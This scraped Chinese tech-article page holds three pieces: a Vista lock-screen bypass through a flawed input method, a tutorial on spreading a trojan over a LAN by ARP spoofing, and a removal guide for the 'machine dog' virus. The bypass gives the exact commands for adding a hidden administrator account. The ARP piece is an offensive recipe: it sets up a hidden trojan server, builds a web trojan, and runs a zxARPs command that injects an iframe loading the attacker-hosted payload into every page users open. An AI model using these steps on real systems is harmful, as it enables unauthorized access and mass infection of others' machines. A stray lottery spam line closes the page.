熱點推薦:
您現在的位置: 電腦學習網 >> 網絡技術 >> 正文

如何繞過Vista登錄驗證

2013-09-12 15:53:37  來源: 網絡技術 

  Vista的一大賣點就是其可靠的安全性,UAC、內置防火墻等功能把Vista打造得如同銅墻鐵壁。難道真的不可被攻破嗎?其實利用輸入法漏洞,無需輸入密碼,就可以直接以系統管理員的權限登錄系統,執行任意操作。如此低級但嚴重的漏洞到底是如何在Vista上重演的呢?
  出現這樣低級的漏洞其實也不能完全怪Vista,存在漏洞的《極點五筆輸入法》才是罪魁禍首。問題出在其6.0版本(2007.2.26.0.98)中,當Vista系統安裝上該版本的《極點五筆輸入法》后,就像兩種獨立的化學物質,本身不會有反應,但當兩者融合在一起的時候,就會產生劇烈的化學反應,低級的漏洞由此誕生。
漏洞觸發條件
  這個漏洞的危害性很大,但是要觸發這個漏洞,也是需要有一定條件的:
  條件1:6.0版本(2007.2.26.0.98)的《極點五筆輸入法》輸入法。這是必要前提,只有該版本的輸入法存在此漏洞,最新的版本已經填補了漏洞。此外,Google輸入法最初的1.0版本也存在此漏洞。
  條件2:系統處于鎖定狀態(按“Windows+L”組合鍵實現)。當Vista啟動到登錄界面時,是不會觸發漏洞的,只有當系統處于鎖定狀態時,漏洞才會被激活。
  滿足這兩點后,我們就可以輕松繞過Vista的密碼驗證,直接進入系統了。下面我們來對這個漏洞進行測試。www.hbhskj.tw
繞過系統驗證登錄
  Step1:假設當前登錄界面處于鎖定狀態下,點擊界面左下角的輸入法選擇按鈕,在出現的菜單中選擇《極點五筆輸入法》。
  Step2:點擊一下登錄界面的空白處,這時會出現《極點五筆輸入法》的輸入法狀態條,在上面點右鍵,在出現的菜單中依次選擇“輸入法設置→設置另存為”。
  Step3:在登錄界面會彈出一個文件保存對話框,在這個對話框中我們可以瀏覽硬盤中的任意文件,包括創建和刪除文件(圖2)!

  Step4:在對話框中操作文件很不方便,況且并不能算是真正的入侵,因此我們可以利用漏洞創建一個具有管理員權限的賬戶,用這個賬戶進入系統。
  在對話框的地址欄中輸入“c:\windows\system32\net.exe user hacker 123456 /add”(圖3),輸入完畢后點擊一下旁邊的“前進”按鈕,這時會有一個“命令提示符”窗口一閃而過。雖然登錄界面看起來沒有什么變化,但我們已經在系統中創建了一個名為hacker,密碼為123456的普通賬戶。

  Step5:接下來我們將它提升為系統的管理員,再次在地址欄中輸入“net localgroup administrators hacker /add”并回車,仍舊是一個“命令提示符”窗口一閃而過。OK,現在我們已經是系統的管理員了,關閉當前的對話框窗口,點擊登錄界面上的“切換用戶”按鈕。接下去請相信你的眼睛,hacker賬戶已經儼然出現在了登錄界面上(圖4)。下面就不用多說了,用hacker賬戶登錄,在Vista系統中盡情的爽吧。

  至此,我們已經成功繞過了Vista的密碼驗證,成為了系統的管理員。而入侵的過程只有短短的幾個步驟,甚至不用借助任何工具,可見這個漏洞一旦形成,危害十分巨大。那么對于這個漏洞,我們該如何防范呢?
漏洞防范技巧
  在上文中我們已經提到漏洞形成的兩個必要條件,因此只要我們能解決其中一條,即可防范漏洞。
  方法1:升級《極點五筆輸入法》的版本,目前最新版本為6.1正式版,只要升級到最新的版本就可以填補漏洞,這是最簡單也是最有效的方法。如果你使用的是其他的輸入法程序,也建議進行一下升級,因為Vista系統作為一個新系統,不少輸入法都還沒做好準備,或多或少都可能存在一些潛在的瑕疵。
  方法2:如果沒有條件升級輸入法版本,也沒有關系,只要不對當前用戶進行“鎖定”操作就可以了,我們也可以用“切換用戶”代替,效果是一樣的,但是“切換用戶”后的登錄界面不存在漏洞。
總結
  在Windows 2000時代,也出現了一些類似的輸入法漏洞,為什么輸入法會頻繁出現這種問題呢?主要還是輸入法本身設計的問題,由于輸入法的幫助文件能執行CMD命令,可以被用來添加管理員賬戶,導致黑客繞過登錄驗證。
  很多用戶都有不升級輸入法的習慣,一旦該版本的輸入法出現漏洞,后果就會很嚴重。建議大家定期更新自己的輸入法,避免被人偷偷登錄。

 
如何在局域網掛arp木馬

  網頁掛馬最難的就是傳播了,小網站易入侵但是訪問人數不多,收獲的肉雞也就不是很多。因此,一種新的掛馬方式開始流行——局域網ARP欺騙掛馬,只要局域網內一臺機子中招了,它就可以在內網傳播含有木馬的網頁,捕獲的肉雞就會成幾何倍數增長。
  局域網ARP欺騙掛馬的好處如下:無需入侵網站,只要你的主機處于局域網中即可,這是它最大的優點;收獲的肉雞多多,短時間內可以收獲數十臺甚至上百臺肉雞,類似網吧這樣由上百臺電腦組成的局域網是最好的掛馬場所;局域網內的用戶訪問任何網站都會中木馬。看了上面的介紹,各位是不是已經蠢蠢欲動了?
第一步:配置木馬服務端
  我們以《黑洞》木馬為例。運行《黑洞》木馬的Client.exe文件,進入Client.exe的主界面后,點擊“文件→創建DLL插入版本服務端程序”。
  進入服務端程序的創建界面后,首先勾選“Win NT/2000/XP/2003下隱藏服務端文件、注冊表、進程和服務”,然后切換到“連接選項”標簽,在“主機”一欄中填入本機的公網IP地址,端口可以保持默認的“2007”。最后在“連接密碼”處填入用來連接對方的密碼,例如123456。設置完成后點擊“生成”按鈕,將木馬服務端保存為muma.exe。

第二步:生成網頁木馬
  既然是掛馬,那當然缺不了網頁木馬了。這里我們用“MS07-33網馬生成器”為例。運行“MS07-33網馬生成器”,在“網馬地址”文本框中輸入木馬所在路徑,由于等會我們要自行架設HTTP服務,所以這里應該填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本機在局域網中的IP地址。點擊“生成網馬”按鈕即可生成網馬hackll.htm。

第三步:開啟本機HTTP服務
  要讓局域網中的其他主機能夠訪問到我們的網馬,就要開啟本機的Http服務。下載Baby Web Server,這是一款簡單的Web服務器軟件,下載后直接運行,在其主界面中點擊“服務→設置”。
  將“網頁目錄”設置為網頁木馬所在的地方,例如C盤根目錄“C:\“。點“確定”回主界面,然后再點“Start”按鈕開啟本機的Http服務。記住要將木馬服務端和網頁木馬放到C盤根目錄。

第四步:局域網掛馬
  最后該請我們的主角出場了,就是上文中提到的小工具,這個工具叫zxARPs,是一個通過ARP欺騙實現局域網掛馬的工具。在使用zxARPs前我們要安裝WinPcap,它是網絡底層驅動包,沒有它zxARPs就運行不了。
  安裝好后將zxARPs放到任意目錄,然后運行“命令提示符”,進入zxARPs所在的目錄,然后輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert “<iframe src=‘http://192.168.0.2/hackll.htm’ width=0 height=0>”。回車后掛馬就成功了。
  從現在開始,局域網中的用戶無論訪問什么網站,都會運行我們的網頁木馬,因為zxARPs在用戶打開網頁的同時已經將掛馬代碼插入到正常網頁中了。

 
如何清除機器狗病毒

  病人:我是一名網管,最近在網吧上班時碰到一件煩心事。網吧里的電腦經常一次性感染七八種病毒(檢查發現,主要有“cmdbc木馬”、“AVPSrv”、“Torjan.Diskman”等),清除后不用多久又會自動生成,就像牛皮癬一樣。我們網吧的電腦可都是裝有還原卡的啊,怎么還會感染病毒呢?
  醫生:根據你的描述,這應該是近段時間比較流行的“機器狗”病毒,這種病毒類似于“下載者”,會將大量的木馬和病毒下載到你的電腦中,其下載的木馬主要就是你剛才提到的那幾種病毒。
  最重要的是,“機器狗”病毒是目前對還原軟件、還原卡破壞能力最強的病毒。“機器狗”目前可以破壞冰點還原、影子系統等還原軟件,還能破壞三茗、小哨兵等硬件還原卡。被破壞的還原卡會失去作用,讓系統徹底暴露在病毒下。
“機器狗”怎么突破還原卡
  病人:謝謝醫生的解答,我現在對這個“機器狗”病毒有點了解了,可我還想知道它是怎么破解還原卡的?
  醫生:“機器狗”的運作流程并不復雜,比起熊貓燒香、AV終結者來說要簡單不少。運行后首先會替換系統的Userinit.exe文件,Userinit.exe是Windows操作系統的一個關鍵進程,用于管理不同的啟動順序,例如用于建立網絡鏈接和Windows殼的啟動。病毒利用Userinit.exe的目的是實現隱蔽啟動。
  接著在Windows\system32\drivers文件夾中生成一個名為Pcihdd.sys的驅動文件,病毒正是借助這個驅動文件來實現還原軟件和還原卡破解的。我們知道還原軟件和還原卡之所以能夠保護硬盤數據,是因為它具有很高的權限,能夠奪取硬盤的控制權,在系統啟動之前,將硬盤中的數據還原。
  而Pcihdd.sys這個文件會和還原軟件或還原卡搶奪硬盤的控制權,大部分還原軟件和還原卡的控制權都會被Pcihdd.sys奪取,它們就失去了還原數據的能力,這樣病毒就可以避開還原卡在硬盤中安營扎寨了。

徹底清除“機器狗”病毒
  病人:“機器狗”果然是一個難纏的病毒,尤其是像我這樣的網吧管理員,剛解決了煩人的“熊貓燒香”,現在來了個更狠的,真是不勝其煩。請問我該如何清除“機器狗”病毒?
  醫生:清除“機器狗”的方法比較簡單,操作步驟如下:
  第一步:用正常的Userinit.exe文件替換被修改的Userinit.exe文件。首先新建一個記事本,輸入如下內容:
  @echo off
  taskkill /f /im userinit.exe
  del userinit.exe /f/q/a
  將這個記事本文件保存為kill.bat,雙擊運行。然后從其他干凈的電腦中拷貝一份Userinit.exe文件,將它放到system32目錄中。
  第二步:刪除pcihdd.sys文件,該文件位于Windows\system32\drivers文件夾中。用記事本打開位于Windows\system32\drivers\etc的HOSTS文件,在最后添加這樣一行:127.0.0.1 www.tomwg.com,修改完后保存文件。
  第三步:用《360安全衛士》配合殺毒軟件清除系統中殘留的盜號木馬病毒。
  第四步:為了更好地預防“機器狗”病毒,我們可以用批處理將Pcihdd.sys 的文件夾設置為禁止修改。批處理關鍵代碼如下:
  md %systemroot%\system32\drivers\pcihdd.sys
  cacls %systemroot%\system32\drivers\pcihdd.sys/e/p everyone:n
  cacls %systemroot%\system32\userinit.exe /e /p everyone:r

總結
  還原卡和還原軟件并不是萬能的,如果僅希望依靠它們來避免中毒不太現實。這段時間病毒技術發展得較快,網管和普通用戶一定要多加關注,以掌握最新病毒的清除方法。

 
From:http://www.hbhskj.tw/Article/Network/201309/385.html
    Copyright © 2005-2013 電腦知識網 Computer Knowledge   All rights reserved.   
    体彩内蒙古十一选五82